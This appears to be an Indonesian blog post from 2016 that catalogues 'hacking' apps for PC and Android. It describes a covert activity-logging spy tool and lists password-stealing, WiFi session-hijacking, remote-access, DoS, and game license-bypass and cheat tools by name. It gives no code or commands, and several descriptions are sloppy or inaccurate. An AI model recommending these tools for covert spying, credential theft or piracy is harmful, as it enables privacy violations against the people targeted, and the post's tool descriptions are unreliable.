Tool ini merupakan sebuah aplikasi mata-mata yang akan mencatat segala aktivitas user secara sembunyi-sembunyi, semua file log atau aktivitas user yang tersimpan dapat kita enkripsi sehinga mudah terlihat. Tool yang setu ini memiliki cara yang cukup mudah, dengan menekan Ctrl+shift+alt+M, maka tool default ini akan langsung bekerja.

Disamping dari 5 aplikasi hacking yang apling banya diminati para hacker masih banyak lagi aplikasi lainya yang perlu anda pelajari lagi. Berikut adalah aplikasi tersebut :

Ø Wingerprint versi 0.6.2
Ø Track eraser pro
Ø Sams big play maker
Ø Actual spy
Ø Privasy keyboard
Ø Lophtrack administrator
Ø Yahoo password+key
Ø Wifi password finder
Ø Facebook password hacker
Ø Internet password look

Kumpulan Aplikasi Hacking PC dan Android 2016
20 Aplikasi Hacker Android

1. SpoofApp
Merupakan aplikasi yang banyak digunakan untuk membantu melindungi privasi telephone anda. Pada awal terbitnya aplikasi ini bisa dijumpai di Play Store. Namun saat ini, aplikasi SpoofApp tidak mendapatkan perizinan dari pihak Play Store dengan alasan yang belum pasti, mungkin karena penyalahgunaan aplikasi.

2. Faceniff
Aplikasi ini memungkinkan pengguna untuk mengendus profil sesorang melalui Wifi. Dalam hal ini pengguna mampu membajak sesi hanya ketika Wifi tidak menggunakan pengamanan EAP.

3. Nmapper
Aplikasi yang dikembangkan oleh Gordon Lyon digunakan untuk menemukan host dan layanan pada jaringan komputer sehingga mampu menciptakan peta jaringan. Cara kerjanya adalah mengirimkan paket khusus ke host target dan kemudian menganalisa tanggapan.

4. Anti-Android Network Toolkit
Kegunaan dari aplikasi ini untuk mendiagnosa jaringan toolkit komprehensif yang memungkinkan untuk audit dan penetrasi kompleks tes dengan menekan tombol. Aplikasi ini mampu memberikan pelaporan dalam bentuk cloud untuk memastikan keamanan jaringan.

5. Andosid
Andosid digunakan para profesional untuk keamanan jaringan dari serangan DOS dan DDOS pada web server dari ponsel.

6. ConnectBot
Aplikasi hacker selanjutnya adalah ConnectBot. Aplikasi ini dapat mengolah sesi SSH simultan yang memungkinkan Anda terhubung ke Secure Shell Server di server berbasis UNIX.

7. SSHDroid
SSHDroid adalah implementasi dari SSH server untuk Android. Aplikasi ini memungkinkan pengguna untuk bisa terhubung ke perangkat dari PC dan mampu menjalankan perintah seperti terminal dan adb sell. Aplikasi ini juga mampu mengedit file melalui SFTP, WinSCP dan Cyberduck.

8. WiFi Analyser
Aplikasi ini mampu mendeteksi dan menunjukkan jaringan Wifi di sekitar Anda.

9. Network Discovery
Network Discovery mampu menemukan host dan scan port dalam jaringan Wifi. Sebuah aplikasi yang hebat untuk menguji keamanan ssuatu jaringan.

10. dSploit
Merupakan aplikasi yang menawarkan toolkit profesional yang paling lengkap dan canggih untuk melakukan beberapa keamanan jaringan pada perangkat mobile.

11. Androrat
Androrat dikembangkan di Java Android sebagai aplikasi client/server.

12. Drozer
Drozer memungkinkan pengguna untuk mencari kelemahan dari suatu aplikasi dan perangkat dengan mengasumsikan peran sebuah aplikasi dengan Dalvik VM, Endpoint IPC dan OS yang mendasari. Dozer menyediakan banyak alat untuk membantu pengguna mengeksploitasi public.

Nah pada nomer selanjutnya, Androfern akan membahas aplikasi hacker Android untuk para gamers. Berikut aplikasinya.

13. Freedom
Aplikai Android yang digunakan untuk melewati pengamana dari verifikasi lisensi dan juga updatan dari Playstore sehingga dapat menjalankan game Android tanpa perlu verifikasi lisensi.

14. Game Killer
Game killer merupakan aplikasi editing data-data pada game yang sedang dimainkan. Cara ini sering dipakai para gamers untuk mendapatkan item-item yang langka.

15. SB Game Hacker
Aplikasi yang hampir sama dengan Game Killer, aplikasi ini mampu memanipulasi data dengan cara editing data yang sedang dimainkan. Untuk menjalankan game ini perlu akses root supaya dapat melaksanakan editing di tiap-tiap nilai/value uang ada.

16. Xxzhushou
Merupakan aplikasi yang paling populer saat ini dikarenakan mampu mendapatkan banyak loot di game Clash of Clans yang notabenenya game tersebut merupakan game paling populer saat ini. Aplikasi ini juga dapat digunakan pada game Boom Beach.

17. Lucky Patcher
Hemm… aplikasi yang penting digunakan untuk melakukan patch pada aplikasi tertentu. Bila anda memainkan game Final Fantasy Android pasti anda akan menjumpai aplikasi yang satu ini. Kebanyakan seri Final Fantasy menggunakan aplikasi lucky patcher untuk menjalankan gamenya.

18. Xmodgames
Aplikasi selanjutnya adalah Xmodgames. Aplikasi yang hampir mirip dengan Xxzhushou yang digunakan untuk memodifikasi game-game tertentu Clash of Clans salah satunya.

19. Hack App Data
Aplikasi yang digunakan untuk melakuka editing data yang terimpan pada aplikasi maupun game Android. Data yang telah tersimpan dapat di edit sesuka hati dengan aplikasi yang satu ini.

20. Hex Editor
Aplikasi hacker Android terakhir adalah Hex Editor. Hex Editor adalah sebuah aplikasi Android yang berguna untuk melakukan editing data dari aplikasi ataupun game yang berbentuk Hex.

December 2016
M T W T F S S
« May   Feb »
 1234
567891011
12131415161718
19202122232425
262728293031  

Categories